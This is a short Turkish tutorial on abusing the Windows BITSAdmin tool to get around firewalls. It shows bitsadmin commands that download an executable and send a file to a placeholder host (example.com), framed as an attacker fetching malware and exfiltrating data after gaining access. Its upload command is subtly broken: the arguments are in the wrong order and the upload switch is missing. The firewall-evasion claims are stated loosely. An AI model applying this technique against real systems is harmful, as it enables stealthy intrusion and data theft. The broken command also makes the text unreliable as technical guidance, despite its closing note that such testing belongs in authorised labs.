BITS (Background Intelligent Transfer Service), Windows XP ve sonraki sürümlerinde yer alan, arka planda dosya transferlerini yönetmek için kullanılan bir Windows bileşenidir. Sistem yöneticileri ve programcılar tarafından dosyaları HTTP web sunucularından veya SMB dosya paylaşımlarından indirmek veya yüklemek için kullanılır. BITSAdmin ise BITS görevlerini oluşturmak, izlemek ve yönetmek için kullanılan bir komut satırı aracıdır.
BITSAdmin Kullanarak Güvenlik Duvarını Atlatma Adımları:
BITS'i Tanıma:
BITS, normal şartlar altında Windows güncellemeleri gibi sistemin kritik işlemleri için arka planda dosya indirme ve yükleme işlemlerini gerçekleştirir. Bu, düşük bant genişliği kullanarak ve kullanıcıyı rahatsız etmeden dosya transferi yapma imkanı tanır.
BITSAdmin Komutlarıyla Dosya İndirme:
BITSAdmin, BITS üzerinden dosya indirme ve yükleme işlemlerini başlatmak için kullanılır. Güvenlik duvarı tarafından genellikle meşru bir sistem işlemi olarak görüldüğü için, bu özelliği kullanarak dosya transferleri yapılabilir. Örneğin, bir dosya indirmek için BITSAdmin ile şu komut kullanılabilir:
bitsadmin /transfer "DownloadJob" http://example.com/file.exe C:\Users\Public\Downloads\file.exe
Bu komut, http://example.com/file.exe adresindeki dosyayı indirip C:\Users\Public\Downloads\ dizinine kaydeder. Güvenlik duvarı bu işlemi genellikle engellemez, çünkü BITS’in meşru bir Windows işlemi olduğunu düşünür.
Güvenlik Duvarını Atlatma Senaryosu:
Bir saldırgan, BITSAdmin'i kullanarak zararlı bir dosyayı güvenlik duvarını atlatarak indirmek isteyebilir. Bu işlem, BITS’in güvenlik duvarı tarafından genellikle kontrol edilmeyen bir Windows bileşeni olması nedeniyle başarılı olabilir.
Güvenlik duvarı HTTP trafiğini izliyor olabilir, ancak BITS üzerinden yapılan işlemler daha az dikkat çekici olabilir.
Gizli ve Uzun Süreli İndirme:
BITS, bant genişliğini optimize etmek için dosyaları yavaş yavaş indirir. Bu da saldırganın büyük dosyaları bile fark edilmeden uzun süreli bir sürede indirmesini sağlar.
BITSAdmin ile Yükleme İşlemi:
Aynı şekilde, BITSAdmin kullanarak bir dosyayı uzak bir sunucuya yüklemek de mümkündür
bitsadmin /transfer "UploadJob" C:\Path\To\File.exe http://example.com/uploadpath
Bu komutla hedef sisteme erişim sağlandıktan sonra veri exfiltration (bilgi sızdırma) yapılabilir.
Özet:
BITSAdmin, Windows’un bir parçası olan BITS hizmetini kullanarak güvenlik duvarlarını atlatmak için kullanılabilecek güçlü bir araçtır. Bu aracın sistem tarafından doğal olarak kabul edilmesi, saldırganların zararlı dosyaları indirmek veya veri sızdırmak için bu yöntemi kullanmasına olanak tanır. Ancak, bu tür işlemlerin yalnızca yetkili test ortamlarında gerçekleştirilmesi gerektiği unutulmamalıdır. Bu tür yöntemler, güvenlik açıklarını anlamak ve iyileştirme süreçleri geliştirmek için kullanılmalıdır.